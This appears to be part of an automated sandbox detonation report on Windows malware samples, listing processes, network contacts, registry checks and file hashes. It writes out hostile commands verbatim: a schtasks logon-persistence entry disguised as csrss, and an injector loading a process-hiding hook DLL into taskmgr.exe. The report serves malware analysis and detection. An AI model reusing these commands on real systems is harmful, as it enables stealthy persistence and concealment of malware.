C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 760
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 640
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1176 -ip 1176
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 784
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 1008
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 1076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 1036
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 1080
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 1036
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 1080
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 1040
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 1584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 1012
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 948
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1176 -ip 1176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 1556
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | humisnee.com | udp |
| NL | 37.48.65.151:443 | humisnee.com | tcp |
| US | 8.8.8.8:53 | survey-smiles.com | udp |
| US | 199.59.243.227:80 | survey-smiles.com | tcp |
| US | 8.8.8.8:53 | 151.65.48.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | 23f8042d-eaef-4f58-9dd3-beb3a12f99cb.ninhaine.com | udp |
| US | 8.8.8.8:53 | server12.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server12.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server12.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server12.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server12.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 100.8.8.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| CZ | 46.8.8.100:443 | server12.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
memory/4496-1-0x0000000004150000-0x0000000004597000-memory.dmp
memory/4496-2-0x00000000045A0000-0x0000000004EC6000-memory.dmp
memory/4496-3-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/4496-7-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/4496-6-0x00000000045A0000-0x0000000004EC6000-memory.dmp
memory/4496-5-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/3700-8-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/3700-9-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/3700-10-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | d3f680a40104a2bf44d1e55ab22cc283 |
| SHA1 | 3e44293bd666ee6842f27001e561442203479698 |
| SHA256 | a5d0a8eb93516f6979ce8da08a5750bf7f0f0fc98a969cd9e5b175dd29302a86 |
| SHA512 | 478c308a40b3da9697ef9925e3d8c375bdc9a51d17d401fdf947f1e9ec7b4b5b59d5aa6e5ab0857825f5dbcb398a1cfffe33f972b6841d2916329f2e2358510b |
memory/3700-16-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1176-17-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1176-18-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/1176-24-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1176-25-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1176-26-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1176-27-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1176-28-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1176-29-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1176-30-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1176-31-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1176-32-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1176-33-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1176-34-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/1176-35-0x0000000000400000-0x00000000021A3000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:12
Platform
win10v2004-20241007-en
Max time kernel
173s
Max time network
204s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-OO5CL.tmp\farlab_setup.tmp | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-OO5CL.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-94B0T.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe | N/A |
| N/A | N/A | C:\9005a0d50ef6d68969\Setup.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-OO5CL.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-94B0T.tmp\farlab_setup.tmp | N/A |
| N/A | N/A | C:\9005a0d50ef6d68969\Setup.exe | N/A |
| N/A | N/A | C:\9005a0d50ef6d68969\Setup.exe | N/A |
Checks installed software on the system
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\FarLabUninstaller\is-EG4BF.tmp | C:\Users\Admin\AppData\Local\Temp\is-94B0T.tmp\farlab_setup.tmp | N/A |
| File created | C:\Program Files (x86)\FarLabUninstaller\is-UGBT0.tmp | C:\Users\Admin\AppData\Local\Temp\is-94B0T.tmp\farlab_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\FarLabUninstaller\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-94B0T.tmp\farlab_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe | C:\Users\Admin\AppData\Local\Temp\is-94B0T.tmp\farlab_setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe | C:\Users\Admin\AppData\Local\Temp\is-94B0T.tmp\farlab_setup.tmp | N/A |
| File created | C:\Program Files (x86)\FarLabUninstaller\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-94B0T.tmp\farlab_setup.tmp | N/A |
| File created | C:\Program Files (x86)\FarLabUninstaller\is-R760C.tmp | C:\Users\Admin\AppData\Local\Temp\is-94B0T.tmp\farlab_setup.tmp | N/A |
| File created | C:\Program Files (x86)\FarLabUninstaller\is-51HE0.tmp | C:\Users\Admin\AppData\Local\Temp\is-94B0T.tmp\farlab_setup.tmp | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-94B0T.tmp\farlab_setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\9005a0d50ef6d68969\Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-OO5CL.tmp\farlab_setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\9005a0d50ef6d68969\Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\9005a0d50ef6d68969\Setup.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe
"C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-OO5CL.tmp\farlab_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OO5CL.tmp\farlab_setup.tmp" /SL5="$7006C,1570064,56832,C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe"
C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe
"C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-94B0T.tmp\farlab_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-94B0T.tmp\farlab_setup.tmp" /SL5="$701EE,1570064,56832,C:\Users\Admin\AppData\Local\Temp\farlab_setup.exe" /SILENT
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
C:\9005a0d50ef6d68969\Setup.exe
C:\9005a0d50ef6d68969\\Setup.exe /q /norestart /x86 /x64 /web
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://farlab.win/pay.php
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa278d46f8,0x7ffa278d4708,0x7ffa278d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,1573472949967493890,2506026937841113401,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,1573472949967493890,2506026937841113401,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,1573472949967493890,2506026937841113401,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1573472949967493890,2506026937841113401,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1573472949967493890,2506026937841113401,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,1573472949967493890,2506026937841113401,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,1573472949967493890,2506026937841113401,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1573472949967493890,2506026937841113401,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1573472949967493890,2506026937841113401,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1573472949967493890,2506026937841113401,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1573472949967493890,2506026937841113401,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fobe1.com | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fobe1.com | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fobe1.com | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | farlab.win | udp |
| US | 104.21.49.138:443 | farlab.win | tcp |
| US | 8.8.8.8:53 | 138.49.21.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
Files
memory/1724-2-0x0000000000401000-0x000000000040B000-memory.dmp
memory/1724-0-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-OO5CL.tmp\farlab_setup.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/1004-7-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-2VLV9.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/3988-20-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3988-22-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1004-24-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1724-26-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-2DRF9.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/3868-32-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/3988-40-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3868-42-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/3868-46-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
| MD5 | 2e376eb0b1d34d82196ca36e2af62c9a |
| SHA1 | 9900e6e87d35d98a46ef1e562af7fd0a3cc483fa |
| SHA256 | 7d68d482cbfcabb5aae94131903209271032693317c684d00df5731c8c8f123e |
| SHA512 | a6a4704880cb8df80defd913f070c6e7086e7f8f765dc7c7346dc273eb4b412999462b7c40863bafd9337a5e91199b4a11bc89df97596cda6d2c1d3dea6a3b8b |
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
| MD5 | c84209349f18afe5a41ce04e9ae8f487 |
| SHA1 | cedbbf404b166a5e72d035760bcb0fa508e4f4cb |
| SHA256 | 4e49c56e4cf9df2e837a8a3010f5a8b4deb096429d56e7fd9ff70ab394663678 |
| SHA512 | 37006954e3afe07fb02d24894cc34794618b78c27a1b514818985b6cc1fa3e896ed99ba2e4aac3f6469d263819bd94ee70e7113946c51ba83c93b74826fc8fa8 |
memory/3868-68-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/3988-70-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4100-71-0x00000000007F0000-0x000000000083C000-memory.dmp
C:\9005a0d50ef6d68969\Setup.exe
| MD5 | 40d87630ef1364a3dc4fd3387212c77d |
| SHA1 | 2ab844ca20815c51960ac5d1d75e93897c9f2df2 |
| SHA256 | a9d2cc918999858aa1e500a8fbc919b6397da6b44b666e3fc0edd38920748212 |
| SHA512 | d81f1e80186f3c9c78a45c235f30da9e6f5cd3ca1f6b153892a1c53decc350b7a5f4f9924f59ab83dc20c31acad783faeebbcb67c9419f74628da6459530c9d3 |
C:\9005a0d50ef6d68969\SetupEngine.dll
| MD5 | 4c0b492d3e96d742ba8922912976b3f8 |
| SHA1 | ee571ea60f3bb2feea2f7a5ff0d02cc7d7524b6e |
| SHA256 | c40f60ab16752e404cae3943f169d8260ad83f380e0c2bd363ad165982608f3e |
| SHA512 | 99e44ffa8b50fbfa378310198582404a4f90b2450677b1f152baa55c6e213fbb5fbd31d0207a45876a57837e2a5d642bd613843e77f9f70b0d842d8bcdf0cfad |
C:\9005a0d50ef6d68969\sqmapi.dll
| MD5 | 6404765deb80c2d8986f60dce505915b |
| SHA1 | e40e18837c7d3e5f379c4faef19733d81367e98f |
| SHA256 | b236253e9ecb1e377643ae5f91c0a429b91c9b30cca1751a7bc4403ea6d94120 |
| SHA512 | a5ff302f38020b31525111206d2f5db2d6a9828c70ef0b485f660f122a30ce7028b5a160dd5f5fbcccb5b59698c8df7f2e15fdf19619c82f4dec8d901b7548ba |
C:\9005a0d50ef6d68969\DHTMLHeader.html
| MD5 | cd131d41791a543cc6f6ed1ea5bd257c |
| SHA1 | f42a2708a0b42a13530d26515274d1fcdbfe8490 |
